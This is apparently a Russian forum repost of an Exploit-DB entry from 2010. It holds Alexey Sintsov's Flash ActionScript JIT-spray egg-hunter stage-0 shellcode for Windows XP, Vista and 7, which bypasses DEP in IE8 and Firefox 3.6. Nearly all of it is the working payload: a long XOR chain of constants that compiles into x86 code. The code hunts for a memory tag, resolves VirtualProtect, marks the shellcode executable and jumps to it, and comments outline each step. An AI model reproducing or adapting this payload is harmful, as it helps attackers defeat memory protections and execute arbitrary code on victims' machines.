Exploit Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
13649
Проверка EDB
  1. Пройдено
Автор
ALEXEY SINTSOV
Тип уязвимости
SHELLCODE
Платформа
WINDOWS
CVE
N/A
Дата публикации
2010-03-27
Код:
// JITed egg-hunter stage-0 shellcode
//      (Permanent DEP bypass)
//
//      By Alexey Sintsov
// [email protected]
// [email protected]
//
// DSecRG - Digital Security Research Group [dsecrg.com]//
//
//      TAG=3135330731353307
//                  its mean 0x07333531 twice!
//
//
//      This version is more universal than old STAGE-0 (that have use Flash Dictionary addr leakage)
//
//
//      Example of usage and tools for modify:  http://www.dsecrg.com/files/pub/tools/JIT.zip
//
//      Find shellcode by TAG          - need time ))
//      Find kernel32.dll module
//      Find VirtualProtect func in kernel32.dll
//      Mark shellcode mem as executable
//      Jump on it...
// 
//
//      Tested on Windows XP SP3/SP2, Windows 7: IE8, FF3.6
//
//      This version use NtAccessCheckAndAuditAlarm syscall, that have one value for XP/Vista/Win7 - 0x02
//      
//      P.S.Spraying can beat ASLR too. 
//     

package {
    import flash.display.*
	public class Loadzz2 extends MovieClip
    {
		function funcXOR1()
		{
			var jit=(0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c58d231^
0x3cffca80^
0x3c0fce80^
0x3c429090^
0x3c026a52^
0x3c2ecd58^
0x6a90053c^
0x6a905a5a^
0x3c90d874^
0x31b85959^
0x3c900733^
0x6aaffa8b^
0x6aafd175^
0x6a595990^
0x3c57c775^
0x3c04ec83^
0x3c90C033^
0x3c9030b0^
0x3c008b64^
0x3c0c408b^
0x3c1c408b^
0x3c08508b^
0x3c20788b^
0x3c90008b^
0x6a6b3f80^
0x3ce9755b^
0x3c904747^
0x6a653f80^
0x3cda755b^
0x3c904747^
0x6a723f80^
0x3ccb755b^
0x3c904747^
0x6a6e3f80^
0x3cbc755b^
0x3c529090^
0x3c3cc283^
0x3c903a8b^
0x3c24148b^
0x3c90d703^
0x3c78c283^
0x3c903a8b^
0x3c24148b^
0x3c90d703^
0x3c18c283^
0x3c903a8b^
0x3c04c283^
0x3c901a8b^
0x3c241c03^
0x3c04c283^
0x3c90328b^
0x3c243403^
0x3c04c283^
0x3c900a8b^
0x3c240c03^
0x3cb89090^
0x3c900000^
0x3c9063b0^
0x3c5074b4^
0x3cb89090^
0x3c906574^
0x3c9072b0^
0x3c506fb4^
0x3cb89090^
0x3c90506c^
0x3c9075b0^
0x3c5061b4^
0x3cb89090^
0x3c907472^
0x3c9056b0^
0x3c5069b4^
0x3c90d78b^
0x3c90C033^
0x3c90ff33^
0x3c535156^
0x3c909090^
0x3c909090^
0x3c574790^
0x3c24048b^
0x3c02e0c1^
0x3c90f003^
0x3c90068b^
0x3c20c483^
0x3c240403^
0x3c20ec83^
0x3c90c933^
0x3c900eb1^
0x3c10c483^
0x3c90f48b^
0x3c90f88b^
0x3c18c483^
0x6a90a6f3^
0x14901474^
0x3c24ec83^
0x3c595b5f^
0x3c90905e^
0x3c9090eb^
0x3c24ec83^
0x3c595b5f^
0x3c90905e^
0x3c90e7d1^
0x3c90cf03^
0x3c90c033^
0x3c018b66^
0x3c02e0c1^
0x3c90c303^
0x3c90188b^
0x3c10c483^
0x3c241c03^
0x3c08c483^
0x3c90905F^
0x3c406a54^
0x3c90016a^
0x3cd3ff57^
0x3c90e7ff^
			0x3ccccccc);			
			return jit;
		}
		
		function Loadzz2()
		{
				var ret1=funcXOR1();
		}
    }
}
 
Источник
www.exploit-db.com

Похожие темы